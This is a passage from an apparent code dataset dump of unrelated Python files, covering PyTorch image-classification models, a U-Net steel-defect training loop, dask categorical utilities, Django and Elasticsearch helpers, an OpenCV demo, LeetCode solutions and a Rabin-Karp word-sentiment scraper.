7)\n\t\t\tnn.BatchNorm2d(64),\t\t\t#这里有1d和2d的\n\t\t)\n\t\tself.fc1 = nn.Linear(32 * 7 * 7*2, 10) # fully connected layer, output 10 classes\n\t\t#self.bn1 = nn.BatchNorm1d(1024, momentum=0.5)\n\t\t#self.fc2 = nn.Linear(1024, 10)\t\t\t\t\t\t\t\t\t#拍扁之后mlp\n\t\t#self.bn2 = nn.BatchNorm1d(10, momentum=0.5)\n\t\tself.dropout=nn.Dropout(0.5)\n\tdef forward(self, x):\n\t\t\n\t\tx = self.conv1(x)\n\t\tx = self.conv2(x)\n\t\tx = x.view(x.size(0), -1) # flatten the output of conv2 to (batch_size, 32 * 7 * 7)\n\t\tx = self.dropout(x)\n\t\toutput = self.fc1(x)\n\t\t# output=self.bn1(output)\n\t\t# output = self.dropout(output)\n\t\t# output = self.fc2(output)\n\t\t# output=self.bn2(output)\n\t\t\n\t\t#torch里面的代价函数自带求softmax所以输出直接logit就好了,mse和crossentropy都是\n\t\t#output = F.softmax(x, dim=1)\n\t\treturn output # return x for visualization\n\nclass residual_block(nn.Module):\n\tdef __init__(self, in_channel, 
out_channel, same_shape=True):\n\t\tsuper(residual_block, self).__init__()\n\t\tself.same_shape = same_shape\n\t\tstride=1 if self.same_shape else 2\n\t\t\n\t\tself.conv1 = conv3x3(in_channel, out_channel, stride=stride)\n\t\tself.bn1 = nn.BatchNorm2d(out_channel)#outchannel或者是输出特征数(mlp)\n\t\t\n\t\tself.conv2 = conv3x3(out_channel, out_channel)\n\t\tself.bn2 = nn.BatchNorm2d(out_channel)\n\t\tif not self.same_shape:\n\t\t\tself.conv3 = nn.Conv2d(in_channel, out_channel, 1, stride=stride)\n\t\t\t#通过步长来减少一半长宽,增加一倍的channel\n\t\t\n\tdef forward(self, x):\n\t\t#经过一次3*3卷积,直接到达输出channel,长宽不变\n\t\t#如果输出比输入channel大了一倍,则步长设为2,长宽减少一半\n\t\tout = self.conv1(x)\n\t\tout = F.relu(self.bn1(out), True)\n\t\t##第一第二层间输入输出channel大小不变,则长宽不变\n\t\tout = self.conv2(out)\n\t\tout = F.relu(self.bn2(out), True)\n\t\t\n\t\t#如果下一个块channel比这层大,如64到128\n\t\t#如果汇合的时候channel不同(输入和输出channel不同的时候进入)\n\t\tif not self.same_shape:\n\t\t\tx = self.conv3(x)\n\t\treturn F.relu(x+out, True)#输入加上输出\n\t\t\nclass resnet(nn.Module):\n\tdef __init__(self, in_channel, num_classes, verbose=False):\n\t\tsuper(resnet, self).__init__()\n\t\tself.verbose = verbose\n\t\t\n\t\tself.block1 = nn.Conv2d(in_channel, 64, 7, 2)#先进行卷积\n\t\t\n\t\tself.block2 = nn.Sequential(\n\t\t\tnn.MaxPool2d(3, 2),\n\t\t\tresidual_block2(64, 64),\n\t\t\tresidual_block2(64, 64),\n\t\t\t\n\t\t)\n\t\tself.block3 = nn.Sequential(\n\t\t\tresidual_block2(64, 128, False),#前后块形状不同了\n\t\t\tresidual_block2(128, 128)\n\t\t)\n\t\tself.block4 = nn.Sequential(\n\t\t\tresidual_block2(128, 256, False),\n\t\t\tresidual_block2(256, 256)\n\t\t)\n\t\t\n\t\tself.block5 = nn.Sequential(\n\t\t\tresidual_block2(256, 512, False),\n\t\t\tresidual_block2(512, 512),\n\t\t\tnn.AvgPool2d(3)\n\t\t)\n\t\t\n\t\tself.classifier1 = nn.Linear(512, num_classes)\n\t\t# self.classifier2 = nn.Linear(512,num_classes)\n\t\t# self.classifier3 = nn.Linear(16, num_classes)\n\tdef forward(self, x):\n\t\tx = self.block1(x)\n\t\t\n\t\t# if self.verbose:\n\t\t\t# print('block 1 output: {}'.format(x.shape))\n\t\tx = self.block2(x)\n\t\t\n\t\t# if self.verbose:\n\t\t\t# print('block 2 output: {}'.format(x.shape))#32,2,2\n\t\tx = self.block3(x)\n\t\t\n\t\t# if self.verbose:\n\t\t\t# print('block 3 output: {}'.format(x.shape))\n\t\t\n\t\tx = self.block4(x)\n\t\t# if self.verbose:\n\t\t# print('block 4 output: {}'.format(x.shape))#128,256,6,6\n\t\tx = self.block5(x)\n\t\t\n\t\t# if self.verbose:\n\t\t#print('block 5 output: {}'.format(x.shape))\n\t\tx = x.view(x.shape[0], -1)#改变一下形状\n\t\t#print('这个x的大小;',x.shape)#128*2340\n\t\tlast_layer = self.classifier1(x)\n\t\t# x = self.classifier2(x)\n\t\t#output = F.softmax(last_layer, dim=1)\n\t\treturn last_layer\n\n\t\t\n\t\t\ndef conv_relu(in_channel, out_channel, kernel, stride=1, padding=0):\n\tlayer = nn.Sequential(\n\t\tnn.Conv2d(in_channel, out_channel, kernel, stride, padding),\n\t\tnn.BatchNorm2d(out_channel, eps=1e-3),\n\t\tnn.ReLU(True)\n\t)\n\treturn layer\n\t\nclass inception(nn.Module):\n\tdef __init__(self, in_channel, out1_1, out2_1, out2_3, out3_1, out3_5, out4_1):\n\t\tsuper(inception, self).__init__()\n\t\t# 第一条线路\n\t\tself.branch1x1 = conv_relu(in_channel, out1_1, 1)\n\t\t\n\t\t# 第二条线路\n\t\tself.branch3x3 = nn.Sequential( \n\t\t\tconv_relu(in_channel, out2_1, 1),\n\t\t\tconv_relu(out2_1, out2_3, 3, padding=1)\n\t\t)\n\t\t\n\t\t# 第三条线路\n\t\tself.branch5x5 = nn.Sequential(\n\t\t\tconv_relu(in_channel, out3_1, 1),\n\t\t\tconv_relu(out3_1, out3_5, 5, padding=2)\n\t\t)\n\t\t\n\t\t# 第四条线路\n\t\tself.branch_pool = nn.Sequential(\n\t\t\tnn.MaxPool2d(3, stride=1, 
padding=1),\n\t\t\tconv_relu(in_channel, out4_1, 1)\n\t\t)\n\t\t\n\tdef forward(self, x):\n\t\tf1 = self.branch1x1(x)\n\t\tf2 = self.branch3x3(x)\n\t\tf3 = self.branch5x5(x)\n\t\tf4 = self.branch_pool(x)\n\t\toutput = torch.cat((f1, f2, f3, f4), dim=1)\n\t\treturn output\n\nclass googlenet(nn.Module):\n\tdef __init__(self, in_channel, num_classes, verbose=False):\n\t\tsuper(googlenet, self).__init__()\n\t\tself.verbose = verbose\n\t\t\n\t\tself.block1 = nn.Sequential(\n\t\t\tconv_relu(in_channel, out_channel=64, kernel=7, stride=2, padding=3),\n\t\t\tnn.MaxPool2d(3, 2)\n\t\t)\n\t\t\n\t\tself.block2 = nn.Sequential(\n\t\t\tconv_relu(64, 64, kernel=1),\n\t\t\tconv_relu(64, 192, kernel=3, padding=1),\n\t\t\tnn.MaxPool2d(3, 2)\n\t\t)\n\t\t\n\t\tself.block3 = nn.Sequential(\n\t\t\tinception(192, 64, 96, 128, 16, 32, 32),\n\t\t\tinception(256, 128, 128, 192, 32, 96, 64),\n\t\t\tnn.MaxPool2d(3, 2)\n\t\t)\n\t\t\n\t\tself.block4 = nn.Sequential(\n\t\t\tinception(480, 192, 96, 208, 16, 48, 64),\n\t\t\tinception(512, 160, 112, 224, 24, 64, 64),\n\t\t\tinception(512, 128, 128, 256, 24, 64, 64),\n\t\t\tinception(512, 112, 144, 288, 32, 64, 64),\n\t\t\tinception(528, 256, 160, 320, 32, 128, 128),\n\t\t\tnn.MaxPool2d(3, 2)\n\t\t)\n\t\t\n\t\tself.block5 = nn.Sequential(\n\t\t\tinception(832, 256, 160, 320, 32, 128, 128),\n\t\t\tinception(832, 384, 182, 384, 48, 128, 128),\n\t\t\tnn.AvgPool2d(2)\n\t\t)\n\t\t\n\t\tself.classifier = nn.Linear(1024, num_classes)\n\t\t\n\tdef forward(self, x):\n\t\tx = self.block1(x)\n\t\tif self.verbose:\n\t\t\tprint('block 1 output: {}'.format(x.shape))\n\t\tx = self.block2(x)\n\t\tif self.verbose:\n\t\t\tprint('block 2 output: {}'.format(x.shape))\n\t\tx = self.block3(x)\n\t\tif self.verbose:\n\t\t\tprint('block 3 output: {}'.format(x.shape))\n\t\tx = self.block4(x)\n\t\tif self.verbose:\n\t\t\tprint('block 4 output: {}'.format(x.shape))\n\t\tx = self.block5(x)\n\t\tif self.verbose:\n\t\t\tprint('block 5 output: {}'.format(x.shape))\n\t\tx = x.view(x.shape[0], -1)\n\t\tx = self.classifier(x)\n\t\treturn x\n#看一下网络输入输出参数\n# test_net = inception(3, 64, 48, 64, 64, 96, 32)\n# test_x = Variable(torch.zeros(1, 3, 96, 96))\n# print('input shape: {} x {} x {}'.format(test_x.shape[1], test_x.shape[2], test_x.shape[3]))\n# test_y = test_net(test_x)\n# print('output shape: {} x {} x {}'.format(test_y.shape[1], test_y.shape[2], test_y.shape[3]))\n\n\n\n\n\n\n\n","sub_path":"1.python基础/new/my_model2.py","file_name":"my_model2.py","file_ext":"py","file_size_in_byte":8706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"319258359","text":"import os\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport cv2\nimport torch\nfrom torchvision import transforms\nfrom torch.optim.lr_scheduler import CyclicLR\nfrom torch.utils.data import DataLoader\nfrom torch import nn\nfrom sklearn.model_selection import train_test_split\n\nfrom configurations import path, img_size, train\nfrom utils import rle2mask, create_balanced_class_sampler, create_boolean_mask\nfrom dataset import ImageData\nfrom model import UNet\nfrom lr_find import lr_find\n\n# https://www.kaggle.com/c/severstal-steel-defect-detection\n\nif __name__ == '__main__':\n\n if not os.path.exists('training_process'):\n os.mkdir('training_process')\n\n use_gpu = torch.cuda.is_available()\n plot_beginning_images = False\n plot_dataloader_examples = False\n use_lr_find = False\n\n batch_size = 12\n\n tr = pd.read_csv(path + 'train.csv')\n print(len(tr))\n\n 
df_all = tr[tr['EncodedPixels'].notnull()].reset_index(drop=True)\n df_train, df_valid = train_test_split(df_all, random_state=42, test_size=0.1)\n\n print(len(df_train), len(df_valid))\n\n if plot_beginning_images:\n columns = 1\n rows = 4\n fig = plt.figure(figsize=(20, columns * rows + 6))\n for i in range(1, columns * rows + 1):\n fn, class_id_str = df_train['ImageId_ClassId'].iloc[i].rsplit('_', -1)\n class_id = int(class_id_str)\n fig.add_subplot(rows, columns, i).set_title(fn)\n img = cv2.imread(path + 'train_images/' + fn)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n mask = rle2mask(df_train['EncodedPixels'].iloc[i], (256, 1600))\n\n # different color codings for different classes\n if class_id == 1:\n img[mask == 1, 0] = 255\n elif class_id == 2:\n img[mask == 1, 1] = 255\n elif class_id == 3:\n img[mask == 1, 2] = 255\n else:\n img[mask == 1, 0:2] = 255\n\n plt.imshow(img)\n plt.show()\n\n # Define transformation(if needed augmentation can be applied here)\n data_transf = transforms.Compose(\n [transforms.Resize(size=(img_size, img_size)), transforms.ToTensor(),\n ])\n\n # Define data\n train_data = ImageData(df=df_train, transform=data_transf, subset='train')\n validation_data = ImageData(df=df_valid, transform=data_transf, subset='valid')\n\n # Define samplers\n train_sampler = create_balanced_class_sampler(df_train)\n validation_sampler = create_balanced_class_sampler(df_valid)\n\n # loader uses sampler\n train_loader = DataLoader(dataset=train_data, batch_size=batch_size, sampler=train_sampler, pin_memory=True)\n validation_loader = DataLoader(dataset=validation_data, batch_size=batch_size, sampler=validation_sampler, pin_memory=True)\n\n if plot_dataloader_examples:\n counts = [0, 0, 0, 0]\n\n values = next(iter(train_loader))\n for i in range(len(values[0])):\n counts[values[2][i].int() - 1] += 1\n plt.imshow(train_data[i][0].permute(1, 2, 0))\n plt.show()\n plt.imshow(np.squeeze(train_data[i][1].permute(1, 2, 0)))\n plt.show()\n print(counts)\n # Create unet model for four classes\n model = UNet(n_class=4)\n if os.path.exists('model.pth'):\n print('Model loaded')\n model.load_state_dict(torch.load('model.pth'))\n\n total_params = sum(p.numel() for p in model.parameters())\n trainable_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(f'Total Paramaters: {total_params}, Trainable Parameters: {trainable_params}')\n\n if use_gpu:\n print('Using CUDA')\n model = model.cuda()\n\n criterion = nn.BCEWithLogitsLoss() # this is more numerically stable than applying sigmoid and using nn.BCELoss()\n lr = 0.0003 # Enter optimal base_lr found by lr_find\n lr_max = 0.003 # enter optimal max_lr fonud by lr_find\n # this only works because pytorch code is changed manually https://github.com/pytorch/pytorch/issues/19003(pytorch 1.2.0 fixes this)\n optimizer = torch.optim.Adam(model.parameters())\n\n if use_lr_find:\n lr_find(model, train_loader, optimizer, criterion, use_gpu)\n\n scheduler = CyclicLR(optimizer, lr, lr_max, cycle_momentum=False)\n\n for epoch in range(25):\n if train:\n # Training loop\n model.train()\n total_training_loss = 0.0\n for i, (data, target, class_ids) in enumerate(train_loader):\n data, target = data, target\n if use_gpu:\n data = data.cuda()\n target = target.cuda()\n\n optimizer.zero_grad()\n output = model.predict(data, use_gpu, class_ids)\n\n loss = criterion(output, target)\n loss.backward()\n\n optimizer.step()\n scheduler.step()\n total_training_loss += loss.item()\n\n img = (data[0].transpose(0, 1).transpose(1, 
2).detach().cpu().numpy())\n output_mask = np.abs(create_boolean_mask(output[0][0].cpu().detach().numpy()) * (-1))\n target_mask = target[0][0].cpu().numpy().astype(np.bool)\n\n img[output_mask == 1, 0] = 1\n img[target_mask == 1, 1] = 1\n # overlapping regions look yellow\n plt.imshow(img)\n plt.savefig(f'training_process/training_{epoch}.png')\n print('Training Epoch: {} - Loss: {:.6f}'.format(epoch + 1, total_training_loss / len(df_train)))\n torch.save(model.state_dict(), 'model.pth')\n\n # Validation Loop\n model.eval()\n total_validation_loss = 0.0\n for i, (data, target, class_ids) in enumerate(validation_loader):\n data, target = data, target\n if use_gpu:\n data = data.cuda()\n target = target.cuda()\n\n optimizer.zero_grad()\n output = model.predict(data, use_gpu, class_ids)\n\n loss = criterion(output, target)\n total_validation_loss += loss.item()\n\n img = (data[0].transpose(0, 1).transpose(1, 2).detach().cpu().numpy())\n output_mask = np.abs(create_boolean_mask(output[0][0].cpu().detach().numpy()) * (-1))\n target_mask = target[0][0].cpu().numpy().astype(np.bool)\n\n img[output_mask == 1, 0] = 1\n img[target_mask == 1, 1] = 1\n\n # overlapping regions look yellow\n plt.imshow(img)\n plt.savefig(f'training_process/validation_{epoch}.png')\n print('Validation Epoch: {} - Loss: {:.6f}'.format(epoch + 1, total_validation_loss / len(df_valid)))\n","sub_path":"src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"558272632","text":"from collections import defaultdict\nimport pandas as pd\nfrom toolz import partition_all\nfrom numbers import Integral\nfrom ..base import tokenize, compute_as_if_collection\nfrom .accessor import Accessor\nfrom .utils import (\n has_known_categories,\n clear_known_categories,\n is_scalar,\n is_categorical_dtype,\n)\ndef _categorize_block(df, categories, index):\n \n df = df.copy()\n for col, vals in categories.items():\n if is_categorical_dtype(df[col]):\n df[col] = df[col].cat.set_categories(vals)\n else:\n df[col] = pd.Categorical(df[col], categories=vals, ordered=False)\n if index is not None:\n if is_categorical_dtype(df.index):\n ind = df.index.set_categories(index)\n else:\n ind = pd.Categorical(df.index, categories=index, ordered=False)\n ind.name = df.index.name\n df.index = ind\n return df\ndef _get_categories(df, columns, index):\n res = {}\n for col in columns:\n x = df[col]\n if is_categorical_dtype(x):\n res[col] = pd.Series(x.cat.categories)\n else:\n res[col] = x.dropna().drop_duplicates()\n if index:\n if is_categorical_dtype(df.index):\n return res, df.index.categories\n return res, df.index.dropna().drop_duplicates()\n return res, None\ndef _get_categories_agg(parts):\n res = defaultdict(list)\n res_ind = []\n for p in parts:\n for k, v in p[0].items():\n res[k].append(v)\n res_ind.append(p[1])\n res = {k: pd.concat(v, ignore_index=True).drop_duplicates() for k, v in res.items()}\n if res_ind[0] is None:\n return res, None\n return res, res_ind[0].append(res_ind[1:]).drop_duplicates()\ndef categorize(df, columns=None, index=None, split_every=None, **kwargs):\n \n meta = df._meta\n if columns is None:\n columns = list(meta.select_dtypes([\"object\", \"category\"]).columns)\n elif is_scalar(columns):\n columns = [columns]\n # Filter out known categorical columns\n columns = [\n c\n for c in columns\n if not (is_categorical_dtype(meta[c]) and has_known_categories(meta[c]))\n ]\n if index is not False:\n if 
is_categorical_dtype(meta.index):\n index = not has_known_categories(meta.index)\n elif index is None:\n index = meta.index.dtype == object\n # Nothing to do\n if not len(columns) and index is False:\n return df\n if split_every is None:\n split_every = 16\n elif split_every is False:\n split_every = df.npartitions\n elif not isinstance(split_every, Integral) or split_every < 2:\n raise ValueError(\"split_every must be an integer >= 2\")\n token = tokenize(df, columns, index, split_every)\n a = \"get-categories-chunk-\" + token\n dsk = {\n (a, i): (_get_categories, key, columns, index)\n for (i, key) in enumerate(df.__dask_keys__())\n }\n prefix = \"get-categories-agg-\" + token\n k = df.npartitions\n depth = 0\n while k > split_every:\n b = prefix + str(depth)\n for part_i, inds in enumerate(partition_all(split_every, range(k))):\n dsk[(b, part_i)] = (_get_categories_agg, [(a, i) for i in inds])\n k = part_i + 1\n a = b\n depth += 1\n dsk[(prefix, 0)] = (_get_categories_agg, [(a, i) for i in range(k)])\n dsk.update(df.dask)\n # Compute the categories\n categories, index = compute_as_if_collection(type(df), dsk, (prefix, 0), **kwargs)\n # Categorize each partition\n return df.map_partitions(_categorize_block, categories, index)\nclass CategoricalAccessor(Accessor):\n \n _accessor_name = \"cat\"\n @property\n def known(self):\n \n return has_known_categories(self._series)\n def as_known(self, **kwargs):\n \n if self.known:\n return self._series\n categories = self._property_map(\"categories\").unique().compute(**kwargs)\n return self.set_categories(categories.values)\n def as_unknown(self):\n \n if not self.known:\n return self._series\n out = self._series.copy()\n out._meta = clear_known_categories(out._meta)\n return out\n @property\n def ordered(self):\n return self._delegate_property(self._series._meta, \"cat\", \"ordered\")\n @property\n def categories(self):\n \n if not self.known:\n msg = (\n \"`df.column.cat.categories` with unknown categories is not \"\n \"supported. Please use `column.cat.as_known()` or \"\n \"`df.categorize()` beforehand to ensure known categories\"\n )\n raise NotImplementedError(msg)\n return self._delegate_property(self._series._meta, \"cat\", \"categories\")\n @property\n def codes(self):\n \n if not self.known:\n msg = (\n \"`df.column.cat.codes` with unknown categories is not \"\n \"supported. 
Please use `column.cat.as_known()` or \"\n \"`df.categorize()` beforehand to ensure known categories\"\n )\n raise NotImplementedError(msg)\n return self._property_map(\"codes\")\n def remove_unused_categories(self):\n \n # get the set of used categories\n present = self._series.dropna().unique()\n present = pd.Index(present.compute())\n if isinstance(self._series._meta, pd.CategoricalIndex):\n meta_cat = self._series._meta\n else:\n meta_cat = self._series._meta.cat\n # Reorder to keep cat:code relationship, filtering unused (-1)\n ordered, mask = present.reindex(meta_cat.categories)\n if mask is None:\n # PANDAS-23963: old and new categories match.\n return self._series\n new_categories = ordered[mask != -1]\n meta = meta_cat.set_categories(new_categories, ordered=meta_cat.ordered)\n return self._series.map_partitions(\n self._delegate_method,\n \"cat\",\n \"set_categories\",\n (),\n {\"new_categories\": new_categories},\n meta=meta,\n token=\"cat-set_categories\",\n )\n","sub_path":"dask/dataframe/categorical.py_no_comments.py","file_name":"categorical.py_no_comments.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583815138","text":"import esprit\nfrom esprit import mappings\nfrom octopus.core import app\nimport json as jsonlib\n\nclass ESDAO(esprit.dao.DomainObject):\n __type__ = 'index'\n __conn__ = esprit.raw.Connection(app.config.get('ELASTIC_SEARCH_HOST'), app.config.get('ELASTIC_SEARCH_INDEX'))\n\n @classmethod\n def mappings(cls):\n return {\n cls.__type__ : mappings.for_type(\n cls.__type__,\n mappings.properties(mappings.type_mapping(\"location\", \"geo_point\")),\n mappings.dynamic_templates(\n [\n mappings.EXACT,\n ]\n )\n )\n }\n\n def json(self):\n return jsonlib.dumps(self.data)\n\n def prep(self):\n pass\n\n def save(self, **kwargs):\n self.prep()\n super(ESDAO, self).save(**kwargs)\n\n","sub_path":"octopus/modules/es/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"354489549","text":"import numpy as np\nimport cv2\n\n\ndef centerOfMass(frame):\n cx = 0\n cy = 0\n count = 0\n for y in range(frame.shape[0]):\n for x in range(frame.shape[1]):\n if frame[y, x] == 255:\n cx += x\n cy += y\n count += 1\n\n if count > 0:\n return (int(cx / count), int(cy / count))\n else:\n return (-1, -1)\n\ncap = cv2.VideoCapture('Micro-dance_2_.avi')\nframeCount = 0\nwhile cap.isOpened():\n ret, frame = cap.read()\n if ret == False:\n break\n # Frame in Graustufen wandeln: cvtColor()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # 1. Frame merken\n if frameCount == 0:\n firstFrame = gray\n frameCount += 1\n # Betrag der Differenz berechnen: absDiff()\n absDiff = cv2.absdiff(gray, firstFrame)\n # Schwellwertbildung\n thresh = 40\n ret, mask = cv2.threshold(absDiff, thresh, 255, cv2.THRESH_BINARY)\n\n # Schwerpunkt bestimmen\n #(cx, cy) = centerOfMass(mask)\n M = cv2.moments(mask)\n if M[\"m00\"]:\n cx = int(M[\"m10\"]/M[\"m00\"])\n cy = int(M[\"m01\"]/M[\"m00\"])\n # Schwerpunkt zeichnen\n cv2.circle(frame, (cx, cy), 5, (0,0,255), cv2.FILLED)\n\n # Anwendung:\n # Vordergrund vor einen anderen Hintergrund setzen\n\n cv2.imshow(\"Video\", frame)\n if cv2.waitKey(30) != -1:\n break\ncap.release()\ncv2.destroyAllWindows()","sub_path":"3. 
Woche/background_subtraction.py","file_name":"background_subtraction.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"419826521","text":"from django.conf.urls import url, include\nfrom . import views\n\napp_name = 'facebook_albums'\n\n\narticle_patterns = [\n url(r'^$', view=views.all_albums, name='landing'),\n url(r'^(?P[0-9]+)/$', view=views.one_album, name='album'),\n]\n\nurlpatterns = [url(r'^', include(article_patterns, namespace=app_name))]\n","sub_path":"navitas/facebook_albums/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"611181738","text":"# sliding window, prefix sum: o(n) time and o(1) space\n# we scan from left to right, \"total\" tracks the \n# sum of the subarray. If the sum is less than s,\n# right moves forward one step, else left moves forward\n# one step, left and right form a window.\nclass Solution(object):\n def minSubArrayLen(self, target, nums):\n \"\"\"\n :type target: int\n :type nums: List[int]\n :rtype: int\n \"\"\"\n total = left = right = 0\n res = len(nums) + 1\n while right < len(nums):\n total += nums[right]\n while total >= target:\n res = min(res, right-left+1)\n total -= nums[left]\n left += 1\n right += 1\n return res if res <= len(nums) else 0\n# Runtime: 62 ms, faster than 69.46% of Python online submissions for Minimum Size Subarray Sum.\n# Memory Usage: 15.4 MB, less than 79.34% of Python online submissions for Minimum Size Subarray Sum.\n\n# sliding window, prefix sum: o(n) time and space\nclass Solution(object):\n def minSubArrayLen(self, target, nums):\n \"\"\"\n :type target: int\n :type nums: List[int]\n :rtype: int\n \"\"\"\n ans = len(nums)+1\n pref = [0]\n for num in nums:\n pref.append(pref[-1]+num)\n p1,p2 = 0,1\n while p2 < len(pref):\n if pref[p2]-pref[p1] < target:\n p2 += 1\n else:\n ans = min(ans, p2-p1)\n p1 += 1\n if ans < len(nums)+1:\n return ans\n else:\n return 0\n# Runtime: 76 ms, faster than 55.39% of Python online submissions for Minimum Size Subarray Sum.\n# Memory Usage: 15.5 MB, less than 23.65% of Python online submissions for Minimum Size Subarray Sum.\n","sub_path":"209. Minimum Size Subarray Sum.py","file_name":"209. 
Minimum Size Subarray Sum.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"328582044","text":"import plotly\r\nimport bs4\r\nfrom urllib.request import urlopen as uReq\r\nfrom urllib.request import Request, urlopen\r\nfrom bs4 import BeautifulSoup as soup\r\n\r\nreq = Request('http://www.nst.com.my/opinion/columnists/2018/05/365668/malaysia', headers={'User-Agent': 'Mozilla/5.0'})\r\nwebpage = urlopen(req).read()\r\n\r\npage_soup = soup(webpage, 'html.parser')\r\n\r\n[s.extract() for s in page_soup(['style', 'script', '[document]', 'head', 'title'])]\r\n\r\narticle = page_soup.getText()\r\n\r\nprint(article)\r\n# d is the number of characters in input alphabet\r\nd = 256\r\nnewText = \"\"\r\npositive = 0\r\nnegative = 0\r\n\r\n# pat -> pattern\r\n# txt -> text\r\n# q -> A prime number\r\n\r\ndef filter(pat, txt, q):\r\n for r in range(len(pat)-1, -1, -1):\r\n global newText\r\n M = len(pat[r])\r\n N = len(txt)\r\n i = 0\r\n j = 0\r\n p = 0 # hash value for pattern\r\n t = 0 # hash value for txt\r\n h = 1\r\n k = 0\r\n cond = False\r\n\r\n if M > N:\r\n return -1\r\n if pat[r] == None or txt == None:\r\n return -1\r\n if pat[r] == \"\" or txt == \"\":\r\n return -1\r\n\r\n # The value of h would be \"pow(d, M-1)%q\"\r\n for i in range(M - 1):\r\n h = (h * d) % q\r\n\r\n # Calculate the hash value of pattern and first window\r\n # of text\r\n for i in range(M):\r\n p = (d * p + ord(pat[r][i].lower())) % q\r\n t = (d * t + ord(txt[i].lower())) % q\r\n\r\n # Slide the pattern over text one by one\r\n for i in range(N - M + 1):\r\n # Check the hash values of current window of text and\r\n # pattern if the hash values match then only check\r\n # for characters on by one\r\n if p == t:\r\n # Check for characters one by one\r\n for j in range(M):\r\n if txt[i + j].lower() != pat[r][j].lower():\r\n break\r\n j += 1\r\n # if p == t and pat[0...M-1] = txt[i, i+1, ...i+M-1]\r\n if j == M:\r\n newText = txt[0:i] + txt[i + M - 1: N]\r\n txt = newText\r\n cond = True\r\n N = (N+1)-M\r\n\r\n # Calculate hash value for next window of text: Remove\r\n # leading digit, add trailing digit\r\n if i < N - M:\r\n t = (d * (t - ord(txt[i].lower()) * h) + ord(txt[i + M].lower())) % q\r\n # We might get negative values of t, converting it to\r\n # positive\r\n if t < 0:\r\n t = t + q\r\n if i >= N-M:\r\n if cond == False:\r\n del pat[r]\r\n\r\n\r\ndef compare(pat, txt, q, sentiment):\r\n M = len(pat)\r\n N = len(txt)\r\n i = 0\r\n j = 0\r\n p = 0 # hash value for pattern\r\n t = 0 # hash value for txt\r\n h = 1\r\n global positive\r\n global negative\r\n\r\n if M > N:\r\n return -1\r\n if pat == None or txt == None:\r\n return -1\r\n if pat == \"\" or txt == \"\":\r\n return -1\r\n\r\n\r\n # The value of h would be \"pow(d, M-1)%q\"\r\n for i in range(M - 1):\r\n h = (h * d) % q\r\n\r\n # Calculate the hash value of pattern and first window\r\n # of text\r\n for i in range(M):\r\n p = (d * p + ord(pat[i].lower())) % q\r\n t = (d * t + ord(txt[i].lower())) % q\r\n\r\n # Slide the pattern over text one by one\r\n for i in range(N - M + 1):\r\n # Check the hash values of current window of text and\r\n # pattern if the hash values match then only check\r\n # for characters on by one\r\n if p == t:\r\n # Check for characters one by one\r\n for j in range(M):\r\n if txt[i + j].lower() != pat[j].lower():\r\n break\r\n\r\n j += 1\r\n # if p == t and pat[0...M-1] = txt[i, i+1, ...i+M-1]\r\n if j == M:\r\n print(\"Pattern 
found starting from index: \" + str(i))\r\n print(\"Pattern matched: \" + str(pat))\r\n if sentiment == True:\r\n positive += 1\r\n if sentiment == False:\r\n negative += 1\r\n # Calculate hash value for next window of text: Remove\r\n # leading digit, add trailing digit\r\n if i < N - M:\r\n t = (d * (t - ord(txt[i].lower()) * h) + ord(txt[i + M].lower())) % q\r\n\r\n # We might get negative values of t, converting it to\r\n # positive\r\n if t < 0:\r\n t = t + q\r\n\r\n\r\ntxt = ' ' + article + ' '\r\n\r\nstopWords = \"a about above after again against all am an and any are aren't as at be because been before being below between both but by can't cannot could couldn't did didn't do does doesn't doing don't down during each few for from further had hadn't has hasn't have haven't having he he'd he'll he's her here here's hers herself him himself his how how's i i'd i'll i'm i've if in into is isn't it it's its itself let's me more most mustn't my myself no nor not of off on once only or other ought our ours ourselves out over own same shan't she she'd she'll she's should shouldn't so some such than that that's the their theirs them themselves then there there's these they they'd they'll they're they've this those through to too under until up very was wasn't we we'd we'll we're we've were weren't what what's when when's where where's which while who who's whom why why's with won't would wouldn't you you'd you'll you're you've your yours yourself yourselves\"\r\nstopWords = stopWords.split()\r\nprint(stopWords)\r\nq = 977 # A prime number\r\n\r\nfor o in range(len(stopWords)):\r\n stopWords[o] = stopWords[o].replace(stopWords[o], ' ' + stopWords[o] + ' ')\r\n\r\nfor l in range(len(stopWords)):\r\n filter(stopWords, txt, q)\r\n txt = newText\r\nprint()\r\nprint()\r\n\r\n\r\nprint(\"POSITIVE:\")\r\nwith open('C:/Users/ASUS/PycharmProjects/karp/positive.txt', 'r') as f:\r\n for line in f:\r\n line = line.replace('–', '')\r\n for word in line.split():\r\n word = word.replace(',', '')\r\n word = word.replace(word, ' '+word+' ')\r\n compare(word, newText, q, True)\r\nprint()\r\n\r\n\r\nprint(\"NEGATIVE:\")\r\nwith open('C:/Users/ASUS/PycharmProjects/karp/negative.txt', 'r') as w:\r\n for line in w:\r\n line = line.replace('–', '')\r\n for word in line.split():\r\n word = word.replace(',', '')\r\n word = word.replace(word, ' '+word+' ')\r\n compare(word, newText, q, False)\r\nprint()\r\nprint()\r\n\r\nprint(\"Positive words count: \"+ str(positive))\r\nprint(\"Negative words count: \"+ str(negative))\r\nprint(\"Text after filtering stop words: \"+ '\"'+newText.strip()+'\"')\r\n\r\nsent = (positive + negative) * (15 / 100)\r\n\r\nprint(str(sent))\r\n\r\nif positive-sent > negative:\r\n print(\"Article sentiment 